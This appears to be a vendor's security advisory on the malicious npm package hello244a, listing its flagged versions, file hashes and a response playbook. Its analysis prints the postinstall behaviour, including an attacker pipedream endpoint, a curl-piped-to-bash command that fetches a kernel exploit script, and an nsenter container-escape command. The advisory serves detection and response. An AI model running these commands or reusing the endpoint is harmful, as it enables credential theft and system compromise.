Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

hello244anpm

hello244a is a confirmed malicious npm package (MAL-2026-5188) that steals credentials and exfiltrates sensitive data (malicious versions 1.0.0, 1.0.1, 1.0.2…). Do not install it — remove it immediately and rotate any exposed credentials.

Malicious code in hello244a (npm)

MAL-2026-5188
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall hello244a

What this malware does

package.json declares a postinstall script that, on npm install, (1) enumerates process.env plus os.hostname(), os.platform(), os.arch(), and whoami output, base64-encodes the collected data, and issues an HTTP GET to a hardcoded pipedream request-bin at http://eodxy50gl486xrx.m.pipedream.net/, exfiltrating installer environment variables and host identity to an attacker-controlled endpoint over cleartext HTTP; (2) on Linux, executes curl -s https://raw.githubusercontent.com/Akabe1/akabe1.github.io/master/_posts/exploits/cve-2021-22555/exploit.sh | bash, fetching and running an unpinned third-party shell script referencing a known Linux kernel local-privilege-escalation CVE; (3) attempts container/sandbox escape via nsenter --mount=/proc/1/ns/mnt -- /bin/sh on Linux and docker exec against running containers on Windows, with results reported back to the same pipedream endpoint. Behavior fires automatically on npm install with no user interaction. Installer harm is concrete: environment variables (which routinely contain credentials, tokens, and CI secrets) plus host identity are leaked to the attacker, and arbitrary attacker-controlled code executes in the installer's user context with privilege-escalation and container-escape attempts.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

The OpenSSF Package Analysis project identified 'hello244a' @ 1.0.12 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.

  • The package executes one or more commands associated with malicious behavior.

Malicious versions

46 flagged
1.0.01.0.11.0.21.0.31.0.41.0.51.0.61.0.71.0.81.0.91.0.101.0.111.0.121.0.131.0.141.0.151.0.161.0.171.0.181.0.191.0.201.0.211.0.221.0.231.0.241.0.251.0.261.0.271.0.281.0.291.0.301.0.311.0.321.0.331.0.341.0.351.0.361.0.371.0.381.0.391.0.401.0.411.0.421.0.431.0.441.0.45

Indicators of compromise (SHA-256)

3d7e9578338cca22e41d1ac1345136162b5441eb57090bb89fbc73bd37976c71
6aa25ec24867364311a41390382cbdfeaf0fcf1d6abe655c14ade480176c0c75
888c12225acb50e47bd79ffd546a7e4d54895f9ed301ebb65074a6e32a542dae
c0816d6d3c6e3a2474dad6d42b1394acee44aa51824aa01e873bcd1060fd1982
02e5f7412a9593e0ec3d0d8c28082c01edff82746bd48966c6fb88a3b1f88866
0b2e823e6d5e19159f5d0f3c0d1fceaef1c90eb961cc6f31f9bd93e5cf765910
10a78ee000df4d44b374e3d0886388c55f98cf8079e5d600d2c28bec6f9089c8
678309e1e7a48b9a291fbaeb58750b2c6921160ce8e7a0413b56ecf6b5ee1bf1
91844b3ed7a531e129cbdeef1746ccd1e8e981f74da00aa2a4aef2edf6b47dbf
8041e418ff653833ccd295f93673f289bc9fbc515fb66680718a053bc1a4de5b
5d451899f4d8d2ab7d7880503508e1132530436029c89933a9a4d57d8445755a
ee3e52c15cbbd220437f536d5d1b15119cc47dd5adee86a7f70e36eae18dd787
2797c2039b59e4ef136dabab4bfb2113ba47609d040d48d70e5f24122991256f
e67e1ac3ebe0599f1ef7628bfed93f89dc1ceaa934b133497b0d06e941c8d289
63485be834cf62e15e0c71c38496ceebe1065b305c10901dcc7cfbcfd6220df7
f4d570029734f86e9cf0d51b0c549a6692436fb0dc58612b838d124564874e28
2690bf52d4b8dc0b8abb22149c410212f762e90e73be48e8334feda7402b3b6d
99df98ac51aae3f9acda13f4f274563a0eeff303a6349704a1653d3919711ad2
bd67c616916d25a157d11ed660627c966488ca97a4ee6bf8e2382d23c1d75629
c98daf5550c30c41ff166df0d108a4635a636f24bd907ca1cfff8cbb5aac1826
fc6764cace1e6feb612e7ff12bc9c43bf55d839ab0ea359958a9b1634dd9d853
af9fd9c21f166c826d9df854f5501d34d32dbfe777df70a3b0820032bf256ffa
4a172263209eef9866f32e2996cddae105cc71fec1b1ea8678695e5622859a28
00b76c8af5dbed2fd523173af4967cd00aa907995e6b91b5b727d63c982c0e1c
22e18ec843e9952b0800984be64f3dd1b9b40dc3122688a13cba9093f92ca358
702c6a4cfb8e95b36780ae72dda84a0230e89c0e55f140788db73383d3cf64be
75a7a6423663be848b8261f859119c0189817397f0e296d3d0bd51443dd4788a
7b2cd07b5ad3fc92d91f09d921624ef65fefc427b02a8bf81b91fb31b4dae7b4
01337a18a8f3a8d1cba5dcd032150a90433c42be151eb8479508a58b97079de6
1d96360d8b57a472189bf71583accf0338e23ec70cebea346064f1eb9770357f
2d18295eb0c607aad90a85e6ed48df53481878d883b2c962e413ed2d271efb38
348997fbeee6d9416803727f9d121814b6cf435f09e1f3d14d2d023dc61abf0c
e9bc9153129c6d11cd92a3d5bf7f772d768196014df7a42897d137d6da954085
10ba0c46aa9b873fb7298e083888ca2bf1b6268e9fdf04151870024351a32c5d
34829a16f8d9c6428610aa03acf911c7039859f6f8b9211e6b28db4bbc929e38
d4508a48b97d99986b1fa1f95324ce961fcfcd1e7dc87440ab5c43fad8dc6a9e
a0d55b5e746ec9b31b37ac8e90c39809c26afc563401b752a1e65ae0eddaf57d
29f244b80dd9670f8f7bd475bf9016c1b944aab93ebd019ad2970187b6ac5641
6a93e5cf005db8ed92bdc8613c8b37b500aa6164ad960dbce6291dad4d437a66
7784bcd51234da04364430810c403fe53066e02cc549e5dd5a842af9a38e275d
e61d50a579ac67141952a5939ef85236dfc31a4bfc195b976dc5fb32ea081081
4533a7188a4cdae8431ec667f1bffc8e997112126c6aaf9f3a177547730baf44
4915af2eedb9b40d7002bab6481c7846da9e65c8d7c0b7e16cad8d83ecb3d94a
58d829145f43f5f110b5c3ba1f2709bdb8460769a98ba39b5fe3f5f2c3aabcfa
783e6b7638ecb38d8df449fba0ee92dc0b887b75ee66ac0fc30c871c3a1d89ff
88b42cfb95f3079d8c90486857895793e71349fdb961f0880c0b573f036ab7fe
a789f50f71677c32e9d0fc52b774f4c64c1dfd9a42139f86c5905d1e5213a487
b5a4dbe2beb8336b6528b2d78c772e7fb3fb448ebd417ba4b0aed6d8f0fd594b
c3ba2f97f448ae4dda207afe8e8cf46caa145efb8d566bc988567f96d831b23b
42a88abc86ec366a6ec3376f916bc2b7c8ec1fa83a237911256b50e4a6353980
245ea5be7202abee84039cab610c3e64583b4a4ef68ab512ca6683493585f4ed
4a4e4cd34da22ac40a0a094f8c32b58dbba5e62914c0fbb092806be3fc7244eb
9ee6e5d09b554fcafdbf7fdc0c8dd80c43079effefe7f8ac43e050d72ed4ddd3
d6c0e8e5021e20cafde74d354d4ef0240dacc8fb8975ded4339e2f9a4f46c603
e829f401b9a76a7e13d89bdcde222305d881a45cfb1ceace4c0b645cecd0014c
4a8d45ba8952a2231178f5d175eb173c678ad0fc41000370a58823f537734259
3c36ae435a04cd43774bc749cfed655da85aeb428f0e1eb270d9f4b13cbaac88
5b99f31a66836e7bdb16fc7cddee34187e1c7fceef596c25ca0cb9421de2dd11
b5b8c5f5813081bb3c4a9003d2cbc82c2eba040ba8c1092acb6c611e6e73129e

Detection & response playbook

Credential / info stealer
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for hello244a (46 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging hello244a across your stack and pipelines.

  2. If you installed it — respond

    hello244a is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

  3. Did it already run?

    If hello244a was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks hello244a before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. hello244a on npm has been identified as a malicious package (versions 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, and 38 more flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005457IN-MAL-2026-005458IN-MAL-2026-006190IN-MAL-2026-006191IN-MAL-2026-006188IN-MAL-2026-006189IN-MAL-2026-007986IN-MAL-2026-008002IN-MAL-2026-007990IN-MAL-2026-008009IN-MAL-2026-007979IN-MAL-2026-008006IN-MAL-2026-008008IN-MAL-2026-008001IN-MAL-2026-007977IN-MAL-2026-007992IN-MAL-2026-007985IN-MAL-2026-008010IN-MAL-2026-007978IN-MAL-2026-007999IN-MAL-2026-007996IN-MAL-2026-007983IN-MAL-2026-007987IN-MAL-2026-008000IN-MAL-2026-008005IN-MAL-2026-008003IN-MAL-2026-007988IN-MAL-2026-008011IN-MAL-2026-008012IN-MAL-2026-007994IN-MAL-2026-007976IN-MAL-2026-007981IN-MAL-2026-008004IN-MAL-2026-008013IN-MAL-2026-008007IN-MAL-2026-007991IN-MAL-2026-007993IN-MAL-2026-007984IN-MAL-2026-007995IN-MAL-2026-007989IN-MAL-2026-007997IN-MAL-2026-007998IN-MAL-2026-007980IN-MAL-2026-007982GHSA-fv97-hqvh-jxcmIN-MAL-2026-008857IN-MAL-2026-008859IN-MAL-2026-008858

References

Credits

  • Amazon Inspector · finder
  • OpenSSF: Package Analysis · finder

Detect & block this

O3 blocks hello244a-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.

Explore